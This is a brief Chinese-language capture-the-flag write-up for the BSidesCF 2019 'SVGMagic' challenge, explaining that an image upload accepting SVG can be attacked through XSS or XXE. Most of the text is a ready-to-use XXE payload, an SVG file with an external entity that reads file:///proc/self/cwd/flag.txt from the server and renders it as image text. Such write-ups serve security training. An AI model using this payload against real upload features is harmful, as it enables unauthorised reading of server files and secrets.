[BSidesCF 2019]SVGMagic

只有一个上传图像的点，查看源码也无异常信息

查阅资料得知svg是一段由html标签语言描述的矢量图形，ctf中由svg可能引发的漏洞有xss,XXE。

上传以下payload即可

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>